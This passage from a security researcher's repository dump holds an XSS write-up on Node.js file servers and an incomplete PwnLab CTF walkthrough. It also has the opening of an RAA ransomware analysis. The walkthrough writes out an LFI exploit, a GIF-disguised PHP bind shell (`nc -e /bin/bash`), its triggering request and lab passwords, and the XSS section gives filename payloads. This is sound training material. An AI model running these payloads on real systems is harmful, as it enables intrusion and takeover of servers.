normalized = normalized.slice(1, normalized.length); }\r\n        res.write('\\r\\n<p><a href=\"/' + normalized + '\">' + name + '</a></p>');\r\n    }\r\n    res.end('\\r\\n</body></html>');\r\n```\r\n\r\nEspecially this line should be bring to our attention:\r\n\r\n```javascript\r\nres.write('\\r\\n<p><a href=\"/' + normalized + '\">' + name + '</a></p>');\r\n```\r\n\r\nIt might not be obvious at first sight, but this code contains [XSS](https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)) vulnerability. \r\n\r\n\r\nIf ```name``` will contain string ```<script>alert('XSS!')</script>```, then the result of this line will be an HTML contains XSS payload send to the browser:\r\n\r\n```html\r\n<p><a href=\"/<script>alert('XSS!')</script>\"><script>alert('XSS!')</script></a></p>\r\n```\r\n\r\nOf course, ```href``` attribute valueis invalid, but this is not important in this attack scenario. Important is that between ```<a>``` and ```</a>``` tags there is perfectly valid ```<script>``` tag which contains malicious JavaScript code.\r\n\r\n\r\nWhen this output will be returned to the browser by ```res.end()``` call, JavaScript will be executed.\r\n\r\n\r\nOk, but this is only some teoretical attack vector. To be able to exploit this vulnerability, we need to put ```<script>alert('XSS!')</script>``` as a file name. Of course, instead of ```alert('XSS!')``` JavaScript code in the payload should do something a little bit more malicious than only displaying popup with some message to be considered as a threat for the users.\r\n\r\nCreating the file with name ```<script>alert('XSS!')</script>``` is the only way to achieve some code execution in the browser. But, due to operating system, there is no way to create file or directory with ```/``` character in the name. \r\n\r\nDo we need one though?\r\n\r\nNot really, because we **do not need to execute JavaScript directly**. We can instead embed ```<iframe>``` element and set its ```src``` attribute to HTML file created in the same directory. And in this HTML file we can implement any logic, including any JavaScript we want. Like ransomware downolader.\r\n\r\nSo, let's summarize what we need to expolit this:\r\n\r\n\r\n- we need to create file with following name: ```\"><iframe src=\"malware_frame.html\">``` This file does not need to contain any content. We need only the name\r\n\r\n- next, we need to create ```malware_frame.html``` file, which will be loaded into the iframe element created in HTML output. Here's very simple example:\r\n\r\n\r\n```html\r\n<html>\r\n\r\n<head>\r\n    <meta charset=\"utf8\" />\r\n    <title>Frame embeded with malware :P</title>\r\n</head>\r\n\r\n<body>\r\n    <script>\r\n        alert('You are pwned!')\r\n    </script>\r\n</body>\r\n\r\n</html>\r\n```\r\n\r\nAs a result, when user will open directory listing in the browser, malicious filename will load ```malicious_frame.html``` file and code from this file will execute:\r\n\r\n![](assets/3.png)\r\n\r\n\r\n\r\n---\r\n\r\nHere's the list with links to reports on HackerOne, where this vulnerability was found (and already fixed):\r\n\r\n\r\n[[simple-server] HTML with iframe element can be used as filename, which might lead to load and execute malicious JavaScript](https://hackerone.com/reports/309641)\r\n\r\n[[simplehttpserver] Stored XSS in file names leads to malicious JavaScript code execution when directory listing is output in HTML](https://hackerone.com/reports/309648)\r\n\r\n[[anywhere] An iframe element with url to malicious HTML file (with eg. JavaScript malware) can be used as filename and served via anywhere](https://hackerone.com/reports/309394)\r\n\r\n[[crud-file-server] Stored XSS in filenames when directory index is served by crud-file-server](https://hackerone.com/reports/311101)\r\n\r\n---\r\n\r\n\r\nTo prevent code against this type of issues, an output needs to be escaped before is send to user's browser:\r\n\r\n\r\n```javascript\r\nreturn '<li><a href=\"'\r\n      + escapeHtml(normalizeSlashes(normalize(path.join('/'))))\r\n      + '\" class=\"' + escapeHtml(classes.join(' ')) + '\"'\r\n      + ' title=\"' + escapeHtml(file.name) + '\">'\r\n      + '<span class=\"name\">' + escapeHtml(file.name) + '</span>'\r\n      + '<span class=\"size\">' + escapeHtml(size) + '</span>'\r\n      + '<span class=\"date\">' + escapeHtml(date) + '</span>'\r\n      + '</a></li>';\r\n\r\n```\r\n\r\nThis fragment comes from [serve-index](https://github.com/expressjs/serve-index/blob/a399faa1801f02ee1885e5664ed21a9c7990b63a/index.js#L279):) middleware for ```ExpressJS``` framework. Calls to ```escapeHtml()``` comes from [escape-html](https://www.npmjs.com/package/escape-html). Let's see what this function does:\r\n\r\n```JavaScript\r\nvar matchHtmlRegExp = /[\"'&<>]/;\r\n\r\n// (...) some other code  here\r\n\r\nfunction escapeHtml(string) {\r\n  var str = '' + string;\r\n  var match = matchHtmlRegExp.exec(str);\r\n\r\n  if (!match) {\r\n    return str;\r\n  }\r\n\r\n  var escape;\r\n  var html = '';\r\n  var index = 0;\r\n  var lastIndex = 0;\r\n\r\n  for (index = match.index; index < str.length; index++) {\r\n    switch (str.charCodeAt(index)) {\r\n      case 34: // \"\r\n        escape = '&quot;';\r\n        break;\r\n      case 38: // &\r\n        escape = '&amp;';\r\n        break;\r\n      case 39: // '\r\n        escape = '&#39;';\r\n        break;\r\n      case 60: // <\r\n        escape = '&lt;';\r\n        break;\r\n      case 62: // >\r\n        escape = '&gt;';\r\n        break;\r\n      default:\r\n        continue;\r\n    }\r\n\r\n    if (lastIndex !== index) {\r\n      html += str.substring(lastIndex, index);\r\n    }\r\n\r\n    lastIndex = index + 1;\r\n    html += escape;\r\n  }\r\n\r\n```\r\n\r\n\r\nNot as sophisticated as it might look like for module which is downloaded almost five millions times per week, isn't it? :)\r\n\r\n\r\nEscaping HTML is quite straightforward operation: you need to change all occurences of special characters like those present in ```matchHtmlRegExp``` in code above and change them into HTML entities. So for example ```<``` will become ```&lt;```, which will still be displayed as ```<``` in the browser, **but** it won't be **interpreted**. So any attempt to embed any of HTML tags, especially ```<script></script>``` pair, which have very bad consequences for your users.\r\n\r\n\r\nSo, instead of input sanitization, like in Path Traversal, this time you need to take care of **output escaping**. Those two rules should become your motto:\r\n\r\n\r\n> **Always sanitize user input, always escape user output**\r\n\r\nNow, you can print this and pin somewhere in front of your eyes :)\r\n\r\n\r\n## nodestructor - Node.js application static code analysis tool\r\n\r\n\r\nAll presented issues in the code are mostly caused by couple of instructions used to read files or create HTML links with ```<a>``` tag. So from some time, I develop a very simple tool for quick static code analysis in Node application - [nodestructor](https://github.com/bl4de/security-tools/blob/master/nodestructor/nodestructor.py).\r\n\r\nWhen you run this tool and set your project directory as the target (or any npm module directory), you will get a quick info, which files contains some well known code patterns lead to some of presented in this post vulnerabilities:\r\n\r\n\r\n![](assets/4.png)\r\n\r\n\r\nAs you can see, an output contains information about each identified pattern, with line number. At the end of the scan, a summary is presented about how many files were scanned and how many pattrens were identified:\r\n\r\n\r\n![](assets/5.png)\r\n\r\n\r\nThe list of patterns is not very impressive, but I use this tool while looking for the issues in Node.js Ecosystem Bug Bounty program and add any new pattern which looks (for me) suspicious or used in the wrong way (without sanitization of user input) might expose some vulnerability.\r\n\r\n\r\nFeel free to use it and modify as you want :) It's under the license called \"There is no license\"\r\n\r\n\r\n## Summary\r\n\r\nKeeping the code secure might be hard from time to time. Some issues are not easy to spot at first point of view. Some of them are not trivial to exploit. \r\n\r\nThe fact your code is available online, helps attackers to look for vulnerabilities and use them against your users. \r\n\r\nFrom the other point of view, the fact that majority of the problems is caused by lack of user input sanitization makes things a little bit easier if you have well defined entry point in your app and use proper sanitization. Escaping output before it's send to the browser is also a good habit.\r\n\r\nIf you have any questions or you think there is something wrong or missing in this post - feel free to ping me on [Twitter](https://twitter.com/_bl4de) or send an email to ```bloorq``` email address in the Google mail domain.\r\n\r\nStay Safe!\r\n\r\nRafal 'bl4de' Janicki\r\n"
  },
  {
    "path": "params.json",
    "content": "{\n  \"name\": \"About me\",\n  \"tagline\": \"About me\",\n  \"body\": \"\\r\\n### whoami\\r\\n--\\r\\n\\r\\n```\\r\\nwhoIsBl4de() {\\r\\n  [\\r\\n    $$BugBounty$$ Hunter, \\r\\n    CTF{flag_seeker}, \\r\\n    coder.createCode([JavaScript,Python,PHP,Bash,C,Java]), \\r\\n    h4cK3R, \\r\\n    https://web.developer\\r\\n  ].random()\\r\\n}\\r\\n```\\r\\nHello and welcome to my GitHub account.\\r\\nIf you'd like to know more about me, this is likely the best place to start :)\\r\\n\\r\\n--\\r\\n\\r\\n### Research\\r\\n\\r\\n#### Hidden directories and files as a source of sensitive information about web application\\r\\n\\r\\nSome analysis about how to get information about web application from folders like _.git_ , _.idea_ and similar.\\r\\nhttps://github.com/bl4de/research/tree/master/hidden_directories_leaks\\r\\n\\r\\nAs a part of this, I'm working on tool (in Python) to extract data from revealed Git repositories:\\r\\n\\r\\nhttps://github.com/bl4de/security-tools/tree/master/diggit\\r\\n\\r\\n#### RAA Ransomware JavaScript code analysis\\r\\n\\r\\nDetailed, step-by-step analysis of RAA ransomware, created entirely in JavaScript\\r\\n\\r\\nhttps://github.com/bl4de/research/tree/master/raa-ransomware-analysis\\r\\n\\r\\n--\\r\\n\\r\\n### Bug Bounty\\r\\n\\r\\n**Bugcrowd**\\t\\t    \\r\\n\\r\\nhttps://bugcrowd.com/bl4de\\r\\n\\r\\n**HackerOne**\\t\\t  \\r\\n\\r\\nhttps://hackerone.com/bl4de\\r\\n\\r\\n**OpenBugBounty**\\r\\n\\r\\nhttps://www.openbugbounty.org/researchers/_bl4de/\\r\\n\\r\\n--\\r\\n\\r\\n### Hall of Fame\\r\\n\\r\\n**OLX** https://security.olx.com/security-hall-of-fame.html\\r\\n\\r\\n\\r\\n### Acknowledgments\\r\\n\\r\\n**Eternity Wall** https://eternitywall.it/m/5ac86b8099d0121ff3b1944309878eb7d1d37341b062ec4a7219957fb5776365\\r\\n\\r\\n--\\r\\n\\r\\n### CTF\\r\\n\\r\\n**CTFtime.org**\\t\\t  \\r\\n\\r\\n#### 2015\\r\\n\\r\\nFinished overall rating place: 562 with 14,677 pts in 2015.\\r\\nTeams with points: 7275, best team result: 1789,884 (Plaid Parliament of Pwning)\\r\\n\\r\\nIn 2015 I've finished in **top 8%** teams in CTFtime ranking with any points (more than 7800 teams in total), with **0,81% points of the best team** :)\\r\\nI was as good as almost 1% of Plaid Parliament of Pwning! :)\\r\\n\\r\\nFull stats: https://ctftime.org/team/12769 (bl4de - not active at this name anymore)\\r\\n\\r\\n#### 2016\\r\\n\\r\\n(in progress...)\\r\\n\\r\\nFull stats: https://ctftime.org/team/16701 (Stack)\\r\\n\\r\\n#### CTF writeups\\r\\n\\r\\nYou can see my **CTF writeups** from variuos events here: https://github.com/bl4de/ctf#ctf-capture-the-flag-writeups-repository\\r\\n\\r\\n--\\r\\n\\r\\n### Me online\\r\\n\\r\\nYou can follow me on **Twitter**. I share IT security, web development and coding related stuff.\\r\\n\\r\\nhttps://twitter.com/_bl4de\\r\\n\\r\\n\\r\\n#### Other sites\\r\\n\\r\\n**Project Euler**\\r\\n\\r\\n![Project Euler badge]\\r\\n(https://projecteuler.net/profile/bl4de.png)\\r\\n\\r\\n--\\r\\n\\r\\n### [PL only]\\r\\n\\r\\nJeśli nie jest Ci obcy język polski ;-), to poza powyższymi miejscami możesz także zajrzeć na strony portalu **sekurak.pl**, gdzie znajdziesz trochę moich tekstów.\\r\\nMożesz je odszukać podając w wyszukiwarce mój nickname (bl4de) lub po prostu kliknąć ten link:\\r\\n\\r\\nhttp://sekurak.pl/?s=bl4de\\r\\n\\r\\n--\\r\\n\\r\\n### About me\\r\\n\\r\\nA few words about myself :)\\r\\n\\r\\nI am Full Stack Web Application developer since October 2007 (professional career, but I have started to write code in Basic on my Commodore 16 when I was 15, in 1992 :) ). After 8-bit era (Commodore 16, 64 and 128) and 16-bit era (Amiga 1200) in 2000 finally I've got my first 32-bit PC machine with Pentium processor and 32 MB RAM. Then in 2002 I've finished my IT Associate Degree and started to learn everything else by myself. From time to time.\\r\\nUnfortunately for me, I was able to start my professional IT career when I was 30 years old, in 2007. Now, I've got web development experience (both server and client) with several technology stacks including LAMP (Linux/Apache/MySQL/PHP) Node.js/server-side JavaScript applications, JavaEE enterprise applications (some basic experience, I am not Java developer).\\r\\n\\r\\nSo, Linux/UNIX machines, Bash, PHP, JavaScript, HTML5, Python, SQL, database engines, web servers, Node, Single Page Applications, AJAX, REST, SOAP/WSDL, Angular, Git, SVN, MongoDB, JSON, EcmaScript 6, Babel, Promises, closures, Public/Protected/Private, constructors, interfaces, imports, includes, Require, modules, components - and many, many, many other words - I know them all :) Even more - I know what they mean and even how to use them! :D\\r\\n\\r\\nDuring all of those years I had a feeling that IT Security is something I'd like to do most. So I've started to improve my knowledge in fields like web applications security, network security, penetration testing.\\r\\nIn 2015 I've started to attend as many CTFs as possible, to do IT security related research, to develop tools for IT security world and to do all this stuff what some guys call 'hacking' ;) \\r\\n\\r\\nSince June 2016 I've also started to participate in couple of bug bounty programs on Bugcrowd and HackerOne.\\r\\nIn July 2016 I was able to send my first couple of bugs finding reports both on HackerOne and BugCrowd and on 1st of August 2016 I've received my first \\\"Hall of Fame\\\" entry and first approved bugs. But that was just the beginning.\\r\\n\\r\\nToday, I'm going to continue my career as successful inedpendent penetration tester, security researcher and bug bounty hunter.\\r\\n\\r\\n--\\r\\n\\r\\n\",\n  \"note\": \"Don't delete this file! It's used internally to help with page regeneration.\"\n}"
  },
  {
    "path": "pwnlab-walkthrough-INCOMLETE.txt",
    "content": "\nStarting Nmap 7.11 ( https://nmap.org ) at 2016-08-07 15:51 IST\nNmap scan report for 192.168.1.2\nHost is up (0.0012s latency).\nNot shown: 65531 closed ports\nPORT      STATE SERVICE VERSION\n80/tcp    open  http    Apache httpd 2.4.10 ((Debian))\n|_http-server-header: Apache/2.4.10 (Debian)\n|_http-title: PwnLab Intranet Image Hosting\n111/tcp   open  rpcbind 2-4 (RPC #100000)\n| rpcinfo: \n|   program version   port/proto  service\n|   100000  2,3,4        111/tcp  rpcbind\n|   100000  2,3,4        111/udp  rpcbind\n|   100024  1          39863/udp  status\n|_  100024  1          56877/tcp  status\n3306/tcp  open  mysql   MySQL 5.5.47-0+deb8u1\n| mysql-info: \n|   Protocol: 53\n|   Version: 5.5.47-0+deb8u1\n|   Thread ID: 51\n|   Capabilities flags: 63487\n|   Some Capabilities: ConnectWithDatabase, Support41Auth, IgnoreSpaceBeforeParenthesis, SupportsTransactions, LongColumnFlag, LongPassword, Speaks41ProtocolNew, FoundRows, Speaks41ProtocolOld, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, IgnoreSigpipes, InteractiveClient, ODBCClient, SupportsCompression\n|   Status: Autocommit\n|_  Salt: 0R04T,}UnJfBVk7oLlY[\n56877/tcp open  status  1 (RPC #100024)\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 23.53 seconds\n\n\n1. LFI with php://filter\n\n--- config.php ---\n\n<?php\n$server\t  = \"localhost\";\n$username = \"root\";\n$password = \"H4u%QJ_H99\";\n$database = \"Users\";\n?>\n\n\n--- login.php ---\n\n<?php\nsession_start();\nrequire(\"config.php\");\n$mysqli = new mysqli($server, $username, $password, $database);\n\nif (isset($_POST['user']) and isset($_POST['pass']))\n{\n       \t$luser = $_POST['user'];\n       \t$lpass = base64_encode($_POST['pass']);\n\n       \t$stmt = $mysqli->prepare(\"SELECT * FROM users WHERE user=? AND pass=?\");\n       \t$stmt->bind_param('ss', $luser, $lpass);\n\n       \t$stmt->execute();\n       \t$stmt->store_Result();\n\n       \tif ($stmt->num_rows == 1)\n       \t{\n       \t\t$_SESSION['user'] = $luser;\n       \t\theader('Location: ?page=upload');\n       \t}\n       \telse\n       \t{\n       \t\techo \"Login failed.\";\n       \t}\n}\nelse\n{\n       \t?>\n       \t<form action=\"\" method=\"POST\">\n       \t<label>Username: </label><input id=\"user\" type=\"test\" name=\"user\"><br />\n       \t<label>Password: </label><input id=\"pass\" type=\"password\" name=\"pass\"><br />\n       \t<input type=\"submit\" name=\"submit\" value=\"Login\">\n       \t</form>\n       \t<?php\n}\n\n\n--- index.php ---\n\n<?php\n//Multilingual. Not implemented yet.\n//setcookie(\"lang\",\"en.lang.php\");\nif (isset($_COOKIE['lang']))\n{\n       \tinclude(\"lang/\".$_COOKIE['lang']);\n}\n// Not implemented yet.\n?>\n<html>\n<head>\n<title>PwnLab Intranet Image Hosting</title>\n</head>\n<body>\n<center>\n<img src=\"images/pwnlab.png\"><br />\n[ <a href=\"/\">Home</a> ] [ <a href=\"?page=login\">Login</a> ] [ <a href=\"?page=upload\">Upload</a> ]\n<hr/><br/>\n<?php\n       \tif (isset($_GET['page']))\n       \t{\n       \t\tinclude($_GET['page'].\".php\");\n       \t}\n       \telse\n       \t{\n       \t\techo \"Use this server to upload and share image files inside the intranet\";\n       \t}\n?>\n</center>\n</body>\n</html>\n\n--- upload.php ---\n\n<?php\nsession_start();\nif (!isset($_SESSION['user'])) { die('You must be log in.'); }\n?>\n<html>\n       \t<body>\n       \t\t<form action='' method='post' enctype='multipart/form-data'>\n       \t\t\t<input type='file' name='file' id='file' />\n       \t\t\t<input type='submit' name='submit' value='Upload'/>\n       \t\t</form>\n       \t</body>\n</html>\n<?php\nif(isset($_POST['submit'])) {\n       \tif ($_FILES['file']['error'] <= 0) {\n       \t\t$filename  = $_FILES['file']['name'];\n       \t\t$filetype  = $_FILES['file']['type'];\n       \t\t$uploaddir = 'upload/';\n       \t\t$file_ext  = strrchr($filename, '.');\n       \t\t$imageinfo = getimagesize($_FILES['file']['tmp_name']);\n       \t\t$whitelist = array(\".jpg\",\".jpeg\",\".gif\",\".png\");\n\n       \t\tif (!(in_array($file_ext, $whitelist))) {\n       \t\t\tdie('Not allowed extension, please upload images only.');\n       \t\t}\n\n       \t\tif(strpos($filetype,'image') === false) {\n       \t\t\tdie('Error 001');\n       \t\t}\n\n       \t\tif($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {\n       \t\t\tdie('Error 002');\n       \t\t}\n\n       \t\tif(substr_count($filetype, '/')>1){\n       \t\t\tdie('Error 003');\n       \t\t}\n\n       \t\t$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;\n\n       \t\tif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {\n       \t\t\techo \"<img src=\\\"\".$uploadfile.\"\\\"><br />\";\n       \t\t} else {\n       \t\t\tdie('Error 4');\n       \t\t}\n       \t}\n}\n\n?>\n\n\nmysql> select * from users;\n+------+------------------+\n| user | pass             |\n+------+------------------+\n| kent | Sld6WHVCSkpOeQ== |\n| mike | U0lmZHNURW42SQ== |\n| kane | aVN2NVltMkdSbw== |\n+------+------------------+\n3 rows in set (0.01 sec)\n\nmysql>\n\n\n\nupload shella:\n\n\nPOST /?page=upload HTTP/1.1\nHost: 192.168.1.2\nContent-Length: 338\nCache-Control: max-age=0\nOrigin: http://192.168.1.2\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2849.0 Safari/537.36\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzKu7nqA1OjocdZOH\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nReferer: http://192.168.1.2/?page=upload\nAccept-Encoding: gzip, deflate\nAccept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4\nCookie: PHPSESSID=gesnddmtnmh14qvciakpjictp1\nConnection: close\n\n------WebKitFormBoundaryzKu7nqA1OjocdZOH\nContent-Disposition: form-data; name=\"file\"; filename=\"pwnlab.gif\"\nContent-Type: image/gif\n\nGIF89ae\n<?php system('nc -l -p 4444 -e /bin/bash &');?>\n\n------WebKitFormBoundaryzKu7nqA1OjocdZOH\nContent-Disposition: form-data; name=\"submit\"\n\nUpload\n------WebKitFormBoundaryzKu7nqA1OjocdZOH--\n\n\nuruchomienie shella:\n\n\nGET /?page=upload HTTP/1.1\nHost: 192.168.1.2\nContent-Length: 0\nCache-Control: max-age=0\nOrigin: http://192.168.1.2\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2849.0 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nReferer: http://192.168.1.2/?page=login\nAccept-Encoding: gzip, deflate\nAccept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4\nCookie: PHPSESSID=gesnddmtnmh14qvciakpjictp1;lang=../upload/8986bd4a045ea87e2d439d2e5ed97feb.gif\nConnection: close\n\n\n\ngain access on remote machine:\n\n\n\nbl4de:~/playground $ nc -vv 192.168.1.2 4444\nfound 0 associations\nfound 1 connections:\n     1:\tflags=82<CONNECTED,PREFERRED>\n       \toutif en0\n       \tsrc 192.168.1.11 port 65273\n       \tdst 192.168.1.2 port 4444\n       \trank info not available\n       \tTCP aux info available\n\nConnection to 192.168.1.2 port 4444 [tcp/krb524] succeeded!\nls -lA\ntotal 20\n-rwxr-xr-x 1 www-data www-data  105 Mar 16 23:32 config.php\ndrwxr-xr-x 2 www-data www-data 4096 Mar 17 10:21 images\n-rwxr-xr-x 1 www-data www-data  623 Mar 16 23:30 index.php\n-rwxr-xr-x 1 www-data www-data  832 Mar 17 11:56 login.php\nlrwxrwxrwx 1 root     root        5 Mar 17 12:03 upload -> /tmp/\n-rwxr-xr-x 1 www-data www-data 1339 Mar 16 23:32 upload.php\n\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\nwww-data@pwnlab:/var/www/html$ ls -lA\nls -lA\ntotal 20\n-rwxr-xr-x 1 www-data www-data  105 Mar 16 23:32 config.php\ndrwxr-xr-x 2 www-data www-data 4096 Mar 17 10:21 images\n-rwxr-xr-x 1 www-data www-data  623 Mar 16 23:30 index.php\n-rwxr-xr-x 1 www-data www-data  832 Mar 17 11:56 login.php\nlrwxrwxrwx 1 root     root        5 Mar 17 12:03 upload -> /tmp/\n-rwxr-xr-x 1 www-data www-data 1339 Mar 16 23:32 upload.php\nwww-data@pwnlab:/var/www/html$ uptime\nuptime\n 17:06:59 up 1 day,  2:12,  0 users,  load average: 0.00, 0.01, 0.05\nwww-data@pwnlab:/var/www/html$ uname -a\nuname -a\nLinux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux\nwww-data@pwnlab:/var/www/html$ cat /etc/motd\ncat /etc/motd\n\nThe programs included with the Debian GNU/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in /usr/share/doc/*/copyright.\n\nDebian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nwww-data@pwnlab:/var/www/html$ clear\n\n\n\npasswords:\n\nkent JWzXuBJJNy\nmike SIfdsTEn6I\nkane iSv5Ym2GRo\n\n\n\n\nwww-data@pwnlab:/var/www$ su kent\nsu kent\nPassword: JWzXuBJJNy\n\nkent@pwnlab:/var/www$ whoami\nwhoami\nkent\nkent@pwnlab:/var/www$ cd ~\ncd ~\nkent@pwnlab:~$ ls -lA\nls -lA\ntotal 12\n-rw-r--r-- 1 kent kent  220 Mar 17 10:06 .bash_logout\n-rw-r--r-- 1 kent kent 3515 Mar 17 10:06 .bashrc\n-rw-r--r-- 1 kent kent  675 Mar 17 10:06 .profile\nkent@pwnlab:~$\n\n\nkent@pwnlab:~$ su kane\nsu kane\nPassword: iSv5Ym2GRo\n\nkane@pwnlab:/home/kent$ cd ~\ncd ~\nkane@pwnlab:~$ ls -lA\nls -lA\ntotal 20\n-rw-r--r-- 1 kane kane  220 Mar 17 10:09 .bash_logout\n-rw-r--r-- 1 kane kane 3515 Mar 17 10:09 .bashrc\n-rwsr-sr-x 1 mike mike 5148 Mar 17 13:04 msgmike\n-rw-r--r-- 1 kane kane  675 Mar 17 10:09 .profile\nkane@pwnlab:~$\n\n\nReszta:\nhttp://blog.safetechinnovations.com/challenges/pwnlabinit-walkthrough/\n\n\n\n\n\n\n\n"
  },
  {
    "path": "raa-ransomware-analysis/README.md",
    "content": "## RAA Ransomware JavaScript code analysis\n\nOn 14th of June 2016 while checking Twitter I spotted an information about new ransomware called RAA Ransomware. Couple of websites mentioned about it as first ransomware created only by using JavaScript.\n\nFollowing some links provided by Polish malware analyst **@hasherezade** (https://github.com/hasherezade, https://twitter.com/hasherezade) I've downloaded RAA JavaScript source code from malwr.com (https://malwr.com/analysis/YmE4MDNlMzk2MjY3NDdlYWE1NzFiOTNlYzVhZTlkM2Y/) to take a look at its internals.\n\n# Table of Contents\n\n- [RAA Ransomware JavaScript code analysis](#raa-ransomware-javascript-code-analysis)\n\t- [What is this writeup about?](#what-is-this-writeup-about)\n- [Analysis](#analysis)\n\t- [Some first thoughts](#some-first-thoughts)\n\t- [Splitting code into separate parts](#splitting-code-into-separate-parts)\n- [How RAA JavaScript works](#how-raa-javascript-works)\n\t- [Execution flow graph](#execution-flow-graph)\n\t- [The beginning](#the-beginning)\n\t- [Here comes the Pony](#here-comes-the-pony)\n\t- [Modify Windows registry](#modify-windows-registry)\n\t- [Connect to the server](#connect-to-the-server)\n\t- [Identify drives, folders and files](#identify-drives-folders-and-files)\n\t- [Last step - encryption of files](#last-step---encryption-of-files)\n\t- [End of the process](#end-of-the-process)\n- [Summary](#summary)\n\t- [Get in touch maybe?](#get-in-touch-maybe)\n- [Links, references](#links-references)\n\n\n--\n\n### What is this writeup about?\n\nAs this is my very first time I was analyzing malicious code (and its worst type - ransomware) - if you're experienced Reverse Engineer or Malware Analysis - you may feel that a lot of things/details is missing here. Please, forgive me.\n\nThis writeup is focused mostly on how JavaScript works in RAA rather than on details of eg. modifying Windows Registry. But as there's a lot of Windows Script Host API used here, I've added reference links for couple of interesting resources, mostly on MSDN pages, if someone will want to dig a little bit more.\n\nFile **raa.js** contains original content of RAA downloaded from malwr.com. Other folders and files contains eg. extracted RTF files or parts of RAA code which I've created and executed \"on the fly\" to find how exactly some parts of the code works.\n\nWhen I've started to work on this, I've tried to refactor variables and function names to something more meaningful. Unfortunately, this did not help much, so I decided not to do this at all. Original names have the same impact on code readability.\n\n\n## Analysis\n\n### Some first thoughts\n\nFor someone like me, who works with JavaScript for eight to ten hours every day and sleeps with ES6 book under the pillow - RAA source code looks like one, big mess. There are even labels used in code to immediately jump off out of the loop (good old Basic GOTO is the grandpa of this). I'll explain how it works when analyzing one of RAA functions below.\n\nUnfortunately, this messy, spaghetti code just does its job. And no Pokemon to catch here after all...\n\n--\n\n### Splitting code into separate parts\n\nFirst look at source of RAA (see **raa.js** file) reveals three main part of the code:\n\n\n```javascript\n/*\n\tCryptoJS library\n\tlines from 1 to 482\n*/\n\n/*\n\tmain ransomware logic\n\tlines from 485 to 1082\n*/\n\n\n/*\n\tpart where first malicious RTF is created\n\tlines from 1083 to the end of file\n*/\n\n```\n\n\n\nRAA contains 3rd party library, used for all encoding and encryption  purposes. It's **CryptoJS** library (source code available here https://code.google.com/archive/p/crypto-js/ or GitHub fork here https://github.com/sytelus/CryptoJS).\n\nAnalysis of CryptoJS is not a part of this writeup - as originally this library is not a part of RAA :) \n\n\n## How RAA JavaScript works\n\n\n### Execution flow graph\n\nNext paragraphs describe in details each function of RAA. Here's a very simplified execution flow chart how they all are executed, starting from the very beginning. For now it does not look good. Every function and variable name is just some random string and there's no way to know what does function or variable responsible for.\n\n```javascript\n// Execution flow of RAA\n\n\t\n\tYUIMqkFkI()\n\t\t|\n\t\t|\n\t\tv\n\tnYuMHHRx()\n\tNWvQtGjjfQX()\n\t\t|\n\t\tv\n\tzQqUzoSxLQ() ---> HxBG()\n\t\t\t\t\t\t|\n\t\t\t\t\t\t|\n\t\t\t\t\t\tv\n\t\t\t\t\ttry {\n\t\t\t\t\t\tuTNMmZ() --------\n\t\t\t\t\t} catch {\t\t\t|\n\t\t\t\t\t\tizzU()\t\t\t|\n\t\t\t\t\t}\t  |\t\t\t\t|\n\t\t\t\t\t\t  |\t\t\t\t|\n\t\t\t\t\t      |\t\t\t\tv\n\t\t\t\t\t\t  |\t\t\tNdpcNJVAPrNj()\n\t\t\t\t\t\t  |\t\t\t\t|\n\t\t\t\t\t\t  |\t\t\t\tv\n\t\t\t\t\t\t  |<-----------izzU()\n\t\t\t\t\t\t  |\n\t\t\t\t\t\t  v\n\t\t\t\t\tiKTzQKbfDJs()\n\t\t\t\t\t      |\n\t\t\t\t\t      v\n\t \t\t\t\tPLnEyqCPKHV()\n\t\t\t\t\t      v\n\t\t\t\t\tnXmsNjMpKTv()\n\t\t\t\t   \tdo {\n\t\t\t\t\t\tKWgwJwOlqJcs(file_to_encrypt)\n\t\t\t\t\t} while (files_to_encrypt)\n\n\n\n\n```\n\nNow, it's time to go through every line of RAA code.\n\n--\n### The beginning\n\nFirst executable line of script is this assigment:\n\n```javascript\nvar TBucypWw = YUIMqkFkI();\n```\n\n**TBucypWw** is the variable which contains key generated by **YUIMqkFkI()** function - it is used in other parts of the code.\n\nLet's take a look at **YUIMqkFkI()** logic:\n\n```javascript\nfunction YUIMqkFkI() {\n    var TBucypWw = \"\";\n    var WKQttPJDfsQE = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789\";\n    for (var i = 0; i < 5; i++)\n        TBucypWw += WKQttPJDfsQE.charAt(Math.floor(Math.random() * WKQttPJDfsQE.length));\n    return TBucypWw;\n}\n```\n\nThis fragment just generates a string which contains five characters randomly chosen from **WKQttPJDfsQE** string. In this writeup, to understand its meaning, how and where it's used, I assigned _**xW5Gf**_ as generated value of **TBucypWw** variable.\n\n--\n\n### Here comes the Pony.\n\nNext executable fragment is this part:\n\n```javascript\nvar Yvwtdbvd = WScript.Arguments;\nif (Yvwtdbvd.length == 0) {\n    nYuMHHRx();\n    NWvQtGjjfQX();\n} else {\n    null;\n}\n```\n\n\nAnd this is the place here's RAA starts its work. After script checks if there are any arguments passed (let's assume that there aren't any) **nYuMHHRx()** is executed (I've truncated content of 